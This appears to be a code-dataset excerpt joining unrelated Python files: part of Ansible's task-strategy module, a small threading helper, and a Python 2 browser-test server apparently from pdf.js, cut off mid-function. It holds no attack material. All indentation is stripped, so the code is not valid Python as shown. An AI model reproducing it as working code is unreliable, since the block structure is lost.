# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
(worker_prc, rslt_q) = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker][0] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
def parent_handler_match(target_handler, handler_name):
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
found_task = iterator.get_original_task(original_host, task_result._task)
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# get the correct loop var for use later
if original_task.loop_control:
loop_var = original_task.loop_control.loop_var or 'item'
else:
loop_var = 'item'
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff:
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and state.run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
# FIXME: should this be a callback?
display.vv("NOTIFIED HANDLER %s" % (handler_name,))
else:
# As there may be more than one handler with the notified name as the
# parent, so we just keep track of whether or not we found one at all
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
display.vv("NOTIFIED HANDLER %s" % (target_handler.get_name(),))
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
self._notified_handlers[listening_handler._uuid].append(original_host)
display.vv("NOTIFIED HANDLER %s" % (listening_handler.get_name(),))
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list nor in the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
# find the host we're actually referring too here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('ansible_facts_cacheable', True)
for target_host in host_list:
if cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
# If we are setting a fact, it should populate non_persistent_facts as well
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff:
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts[host.name]
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = included_file._task.copy()
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option")
included_file._task.tags = tags
ti_copy.vars = temp_vars
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=None,
task_include=ti_copy,
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
result = self._do_handler_run(handler, handler.get_name(), iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
if handler._uuid not in iterator._task_uuid_cache:
iterator._task_uuid_cache[handler._uuid] = handler
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_pending_results(iterator)
try:
included_files = IncludedFile.process_include_results(
host_results,
self._tqm,
iterator=iterator,
inventory=self._inventory,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
result = self._do_handler_run(
handler=task,
handler_name=None,
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# wipe the notification list
self._notified_handlers[handler._uuid] = []
display.debug("done running handlers, result is: %s" % result)
return result
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
# FIXME(s):
# * raise an error or show a warning when a conditional is used
# on a meta task that doesn't support them
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
msg = "noop"
elif meta_action == 'flush_handlers':
self.run_handlers(iterator, play_context)
msg = "ran handlers"
elif meta_action == 'refresh_inventory':
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
connection.reset()
msg = 'reset connection'
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
|
utils.py
|
import threading
def create_thread(obj):
obj_thread = threading.Thread(target=obj.run, daemon=True)
obj_thread.start()
while obj_thread.isAlive():
obj_thread.join(1)
obj_response = obj.get_response()
return obj_response
|
test.py
|
# Copyright 2012 Mozilla Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json, platform, os, shutil, sys, subprocess, tempfile, threading
import time, urllib, urllib2, hashlib, re, base64, uuid, socket, errno
import traceback
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from optparse import OptionParser
from urlparse import urlparse, parse_qs
from threading import Lock
USAGE_EXAMPLE = "%prog"
# The local web server uses the git repo as the document root.
DOC_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
GIT_CLONE_CHECK = True
DEFAULT_MANIFEST_FILE = 'test_manifest.json'
EQLOG_FILE = 'eq.log'
BROWSERLOG_FILE = 'browser.log'
REFDIR = 'ref'
TEST_SNAPSHOTS = 'test_snapshots'
TMPDIR = 'tmp'
VERBOSE = False
BROWSER_TIMEOUT = 120
SERVER_HOST = "localhost"
lock = Lock()
class TestOptions(OptionParser):
def __init__(self, **kwargs):
OptionParser.__init__(self, **kwargs)
self.add_option("-m", "--masterMode", action="store_true", dest="masterMode",
help="Run the script in master mode.", default=False)
self.add_option("--noPrompts", action="store_true", dest="noPrompts",
help="Uses default answers (intended for CLOUD TESTS only!).", default=False)
self.add_option("--manifestFile", action="store", type="string", dest="manifestFile",
help="A JSON file in the form of test_manifest.json (the default).")
self.add_option("-b", "--browser", action="store", type="string", dest="browser",
help="The path to a single browser (right now, only Firefox is supported).")
self.add_option("--browserManifestFile", action="store", type="string",
dest="browserManifestFile",
help="A JSON file in the form of those found in resources/browser_manifests")
self.add_option("--reftest", action="store_true", dest="reftest",
help="Automatically start reftest showing comparison test failures, if there are any.",
default=False)
self.add_option("--port", action="store", dest="port", type="int",
help="The port the HTTP server should listen on.", default=8080)
self.add_option("--unitTest", action="store_true", dest="unitTest",
help="Run the unit tests.", default=False)
self.add_option("--fontTest", action="store_true", dest="fontTest",
help="Run the font tests.", default=False)
self.add_option("--noDownload", action="store_true", dest="noDownload",
help="Skips test PDFs downloading.", default=False)
self.add_option("--statsFile", action="store", dest="statsFile", type="string",
help="The file where to store stats.", default=None)
self.add_option("--statsDelay", action="store", dest="statsDelay", type="int",
help="The amount of time in milliseconds the browser should wait before starting stats.", default=10000)
self.set_usage(USAGE_EXAMPLE)
def verifyOptions(self, options):
if options.reftest and (options.unitTest or options.fontTest):
self.error("--reftest and --unitTest/--fontTest must not be specified at the same time.")
if options.masterMode and options.manifestFile:
self.error("--masterMode and --manifestFile must not be specified at the same time.")
if not options.manifestFile:
options.manifestFile = DEFAULT_MANIFEST_FILE
if options.browser and options.browserManifestFile:
print "Warning: ignoring browser argument since manifest file was also supplied"
if not options.browser and not options.browserManifestFile:
print "Starting server on port %s." % options.port
if not options.statsFile:
options.statsDelay = 0
return options
def prompt(question):
'''Return True iff the user answered "yes" to |question|.'''
inp = raw_input(question +' [yes/no] > ')
return inp == 'yes'
MIMEs = {
'.css': 'text/css',
'.html': 'text/html',
'.js': 'application/javascript',
'.json': 'application/json',
'.svg': 'image/svg+xml',
'.pdf': 'application/pdf',
'.xhtml': 'application/xhtml+xml',
'.gif': 'image/gif',
'.ico': 'image/x-icon',
'.png': 'image/png',
'.log': 'text/plain',
'.properties': 'text/plain'
}
class State:
browsers = [ ]
manifest = { }
taskResults = { }
remaining = { }
results = { }
done = False
numErrors = 0
numEqFailures = 0
numEqNoSnapshot = 0
numFBFFailures = 0
numLoadFailures = 0
eqLog = None
saveStats = False
stats = [ ]
lastPost = { }
class UnitTestState:
browsers = [ ]
browsersRunning = 0
lastPost = { }
numErrors = 0
numRun = 0
class Result:
def __init__(self, snapshot, failure, page):
self.snapshot = snapshot
self.failure = failure
self.page = page
class TestServer(ThreadingMixIn, HTTPServer):
pass
class TestHandlerBase(BaseHTTPRequestHandler):
# Disable annoying noise by default
def log_request(code=0, size=0):
if VERBOSE:
BaseHTTPRequestHandler.log_request(code, size)
def handle_one_request(self):
try:
BaseHTTPRequestHandler.handle_one_request(self)
except socket.error, v:
if v[0] == errno.ECONNRESET:
# Ignoring connection reset by peer exceptions
if VERBOSE:
print 'Detected connection reset'
elif v[0] == errno.EPIPE:
if VERBOSE:
print 'Detected remote peer disconnected'
elif v[0] == 10053:
if VERBOSE:
print 'An established connection was aborted by the' \
' software in your host machine'
else:
raise
def finish(self,*args,**kw):
# From http://stackoverflow.com/a/14355079/1834797
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def sendFile(self, path, ext):
self.send_response(200)
self.send_header("Accept-Ranges", "bytes")
self.send_header("Content-Type", MIMEs[ext])
self.send_header("Content-Length", os.path.getsize(path))
self.end_headers()
with open(path, "rb") as f:
self.wfile.write(f.read())
def sendFileRange(self, path, ext, start, end):
file_len = os.path.getsize(path)
if (end is None) or (file_len < end):
end = file_len
if (file_len < start) or (end <= start):
self.send_error(416)
return
chunk_len = end - start
time.sleep(chunk_len / 1000000.0)
self.send_response(206)
self.send_header("Accept-Ranges", "bytes")
self.send_header("Content-Type", MIMEs[ext])
self.send_header("Content-Length", chunk_len)
self.send_header("Content-Range", 'bytes ' + str(start) + '-' + str(end - 1) + '/' + str(file_len))
self.end_headers()
with open(path, "rb") as f:
f.seek(start)
self.wfile.write(f.read(chunk_len))
def do_GET(self):
url = urlparse(self.path)
# Ignore query string
path, _ = urllib.unquote_plus(url.path), url.query
path = os.path.abspath(os.path.realpath(DOC_ROOT + os.sep + path))
prefix = os.path.commonprefix(( path, DOC_ROOT ))
_, ext = os.path.splitext(path.lower())
if url.path == "/favicon.ico":
self.sendFile(os.path.join(DOC_ROOT, "test", "resources", "favicon.ico"), ext)
return
if os.path.isdir(path):
self.sendIndex(url.path, url.query)
return
if not (prefix == DOC_ROOT
and os.path.isfile(path)
and ext in MIMEs):
print path
self.send_error(404)
return
if 'Range' in self.headers:
range_re = re.compile(r"^bytes=(\d+)\-(\d+)?")
parsed_range = range_re.search(self.headers.getheader("Range"))
if parsed_range is None:
self.send_error(501)
return
if VERBOSE:
print 'Range requested %s - %s: %s' % (
parsed_range.group(1), parsed_range.group(2))
start = int(parsed_range.group(1))
if parsed_range.group(2) is None:
self.sendFileRange(path, ext, start, None)
else:
end = int(parsed_range.group(2)) + 1
self.sendFileRange(path, ext, start, end)
return
self.sendFile(path, ext)
class UnitTestHandler(TestHandlerBase):
def sendIndex(self, path, query):
print "send index"
def translateFont(self, base64Data):
self.send_response(200)
self.send_header("Content-Type", "text/xml")
self.end_headers()
data = base64.b64decode(base64Data)
taskId = str(uuid.uuid4())
fontPath = 'ttx/' + taskId + '.otf'
resultPath = 'ttx/' + taskId + '.ttx'
with open(fontPath, "wb") as f:
f.write(data)
# When fontTools used directly, we need to snif ttx file
# to check what version of python is used
ttxPath = ''
for path in os.environ["PATH"].split(os.pathsep):
if os.path.isfile(path + os.sep + "ttx"):
ttxPath = path + os.sep + "ttx"
break
if ttxPath == '':
self.wfile.write("<error>TTX was not found</error>")
return
ttxRunner = ''
with open(ttxPath, "r") as f:
firstLine = f.readline()
if firstLine[:2] == '#!' and firstLine.find('python') > -1:
ttxRunner = firstLine[2:].strip()
with open(os.devnull, "w") as fnull:
if ttxRunner != '':
result = subprocess.call([ttxRunner, ttxPath, fontPath], stdout = fnull)
else:
result = subprocess.call([ttxPath, fontPath], stdout = fnull)
os.remove(fontPath)
if not os.path.isfile(resultPath):
self.wfile.write("<error>Output was not generated</error>")
return
with open(resultPath, "rb") as f:
self.wfile.write(f.read())
os.remove(resultPath)
return
def do_POST(self):
with lock:
url = urlparse(self.path)
numBytes = int(self.headers['Content-Length'])
content = self.rfile.read(numBytes)
# Process special utility requests
if url.path == '/ttx':
self.translateFont(content)
return
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
result = json.loads(content)
browser = result['browser']
UnitTestState.lastPost[browser] = int(time.time())
if url.path == "/tellMeToQuit":
tellAppToQuit(url.path, url.query)
UnitTestState.browsersRunning -= 1
UnitTestState.lastPost[browser] = None
return
elif url.path == '/info':
print result['message']
elif url.path == '/submit_task_results':
status, description = result['status'], result['description']
UnitTestState.numRun += 1
if status == 'TEST-UNEXPECTED-FAIL':
UnitTestState.numErrors += 1
message = status + ' | ' + description + ' | in ' + browser
if 'error' in result:
message += ' | ' + result['error']
print message
else:
print 'Error: uknown action' + url.path
class PDFTestHandler(TestHandlerBase):
def sendIndex(self, path, query):
if not path.endswith("/"):
# we need trailing slash
self.send_response(301)
redirectLocation = path + "/"
if query:
redirectLocation += "?" + query
self.send_header("Location", redirectLocation)
self.end_headers()
return
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.end_headers()
if query == "frame":
self.wfile.write("<html><frameset cols=*,200><frame name=pdf>" +
"<frame src='" + path + "'></frameset></html>")
return
location = os.path.abspath(os.path.realpath(DOC_ROOT + os.sep + path))
self.wfile.write("<html><body><h1>PDFs of " + path + "</h1>\n")
for filename in os.listdir(location):
if filename.lower().endswith('.pdf'):
self.wfile.write("<a href='/web/viewer.html?file=" +
urllib.quote_plus(path + filename, '/') + "' target=pdf>" +
filename + "</a><br>\n")
self.wfile.write("</body></html>")
def do_POST(self):
with lock:
numBytes = int(self.headers['Content-Length'])
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
url = urlparse(self.path)
if url.path == "/tellMeToQuit":
tellAppToQuit(url.path, url.query)
return
result = json.loads(self.rfile.read(numBytes))
browser = result['browser']
State.lastPost[browser] = int(time.time())
if url.path == "/info":
print result['message']
return
id = result['id']
failure = result['failure']
round = result['round']
page = result['page']
snapshot = result['snapshot']
taskResults = State.taskResults[browser][id]
taskResults[round].append(Result(snapshot, failure, page))
if State.saveStats:
stat = {
'browser': browser,
'pdf': id,
'page': page,
'round': round,
'stats': result['stats']
}
State.stats.append(stat)
def isTaskDone():
last_page_num = result['lastPageNum']
rounds = State.manifest[id]['rounds']
for round in range(0,rounds):
if not taskResults[round]:
return False
latest_page = taskResults[round][-1]
if not latest_page.page == last_page_num:
return False
return True
if isTaskDone():
